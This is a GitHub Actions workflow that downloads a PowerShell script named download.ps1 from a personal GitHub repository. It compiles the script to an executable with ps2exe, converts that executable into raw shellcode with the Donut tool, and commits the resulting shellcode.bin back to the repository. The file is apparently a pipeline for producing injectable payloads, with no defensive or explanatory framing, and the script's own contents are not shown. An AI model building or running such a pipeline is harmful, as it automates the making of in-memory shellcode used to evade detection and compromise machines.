name: Convert and Upload Shellcode

on:
  push:
    paths:
      - download.ps1

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Download the latest download.ps1
      run: Invoke-WebRequest -Uri https://raw.githubusercontent.com/43a1723/test/main/download.ps1 -OutFile download.ps1
      shell: powershell

    - name: Install ps2exe module
      run: Install-Module -Name ps2exe -RequiredVersion 1.0.13 -Scope CurrentUser -Force -SkipPublisherCheck
      shell: pwsh

    - name: Convert PS1 to EXE using ps2exe
      run: |
        $ps2exePath = "C:\Users\runneradmin\Documents\PowerShell\Modules\ps2exe\1.0.13\ps2exe.ps1"
        powershell -File $ps2exePath -inputFile download.ps1 -outputFile download.exe
      shell: pwsh

    - name: Download Donut
      run: |
        Invoke-WebRequest -Uri https://github.com/TheWover/donut/releases/download/v1.0/donut_v1.0.zip -OutFile donut_v1.0.zip
        Expand-Archive -Path donut_v1.0.zip
      shell: powershell

    - name: Convert EXE to Shellcode
      run: .\donut_v1.0\donut.exe -i download.exe -o shellcode.bin
      shell: powershell

    - name: Commit and Push changes
      run: |
        git config --global user.name 'github-actions[bot]'
        git config --global user.email 'github-actions[bot]@users.noreply.github.com'
        git add shellcode.bin
        git commit -m "Add updated shellcode.bin"
        git push
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      shell: pwsh
